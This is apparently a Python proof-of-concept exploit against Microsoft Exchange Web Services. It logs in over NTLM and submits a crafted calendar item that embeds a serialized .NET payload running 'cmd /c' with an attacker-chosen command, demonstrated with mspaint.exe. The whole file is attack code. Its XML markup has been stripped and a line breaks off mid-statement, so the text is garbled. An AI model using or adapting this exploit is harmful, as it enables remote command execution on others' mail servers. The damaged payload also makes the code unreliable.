import requests import time import sys from base64 import b64encode from requests_ntlm2 import HttpNtlmAuth from urllib3.exceptions import InsecureRequestWarning from urllib import quote_plus requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) target = "" username = "john" pwd = "" cmd = "mspaint.exe" def escape(_str): _str = _str.replace("&", "&") _str = _str.replace("<", "<") _str = _str.replace(">", ">") _str = _str.replace("\"", """) return _str payload2 = """ ahihi asdasdasdasdasd <__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/> Start cmd /c %s Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters """ % escape( cmd) payload2 = escape(payload2) payload1 = """ Dlt/1 P0DT2H0M0.0S 4 Sunday 1 Std P0DT2H0M0.0S 10 Sunday -1 Dlt/2007 P0DT2H0M0.0S 3 Sunday 2 Std P0DT2H0M0.0S 11 Sunday 1 0 1 2007-01-01T08:00:00.000Z Weekly Update Meeting %s Come hear about how the Organized Observational Paradigm SkyNet project is coming along! 30 2021-04-22T06:45:32.868-08:00 2021-04-22T06:55:32.868-08:00 Contoso Main Gallery Administrator@evil.corp john@evil.corp mart@evil.corp 1 2021-04-22T06:45:32.868-08:00 2 """ % payload2 res = requests.post("https://%s/ews/Exchange.asmx" % target, data=payload1, headers={ "Content-type": "text/xml; charset=utf-8", }, verify=False, auth=HttpNtlmAuth('%s' % (username), pwd)) if res.status_code != 200: print("error 1") exit() ct = res.content item_id = ct.split(' """ % (item_id, change_key) res = requests.post("https://%s/ews/Exchange.asmx" % target, data=req_del, headers={ "Content-type": "text/xml; charset=utf-8", }, verify=False, auth=HttpNtlmAuth('%s' % (username), pwd))